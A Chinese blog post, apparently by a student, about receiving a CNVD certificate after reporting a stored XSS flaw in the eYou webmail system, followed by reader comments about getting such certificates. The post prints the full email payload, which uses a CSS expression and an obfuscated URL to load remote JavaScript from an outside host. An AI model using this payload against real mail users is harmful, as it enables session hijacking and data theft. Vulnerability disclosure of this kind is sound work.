今天终于收到了CNVD发来的证书,铜版纸印的证书,质量还算可以,不过是顺丰快递的,运费不少啊。
能拿到这个证书是因为前一阵研究XSS漏洞,拿学校的邮件系统练手,发现了一个小XSS注入点,然后看到网上有人提交漏洞得到证书,于是果断试一试,结果还真的可以。
这个XSS漏洞出在亿邮邮件系统,而很多大学正是采用这个系统的。漏洞原理与80sec对QQ Mail的XSS渗透相似。
只要给用户发送一封这样的邮件,就可以实现跨域JavaScript调用。
漏洞测试邮件 </bad_tag style=’tt:expression((function(){if (typeof(t)==”undefined”){t=1}else{t++};if (t==1){scriptDom = document.createElement(“script”);scriptDom.src=”ht”/**/+”tp://battab.sinaapp.com/webapps/mail/xss.js.php”;document.getElementsByTagName(“head”)[0].appendChild(scriptDom);}})())’>
演示如下:
发送邮件
跨站脚本执行成功
被调用的JavaScript源代码
可以看到,邮件未对XSS代码进行有效过滤
其实研究信息安全也不错,还能弄张证书呢。
今中午的讨论,谢谢啦
膜拜学霸
老哥 怎么才能得证书啊 能说下吗 谢谢了
我朝干正经事的单位实在不多呀,这算一个吧
至少比较官方嘛
这都可以吗!~
当然可以的,CNVD证书不是非常难弄到的。
越熟越才知道你这牛啊!
老师过奖了
麻烦问下你的证书是CNVD自己给你寄过来的吗?还是要联系他们才能寄过来呢?谢谢
作为新手看这个文章非常的有用啊。。。
感觉效率有点低。提交第一天就二审通过了,快一个半月的时候三审通过,现在漏洞都公开了,证书都没下来。
归档很久了,也没证书下来。
事业单位的效率,没有办法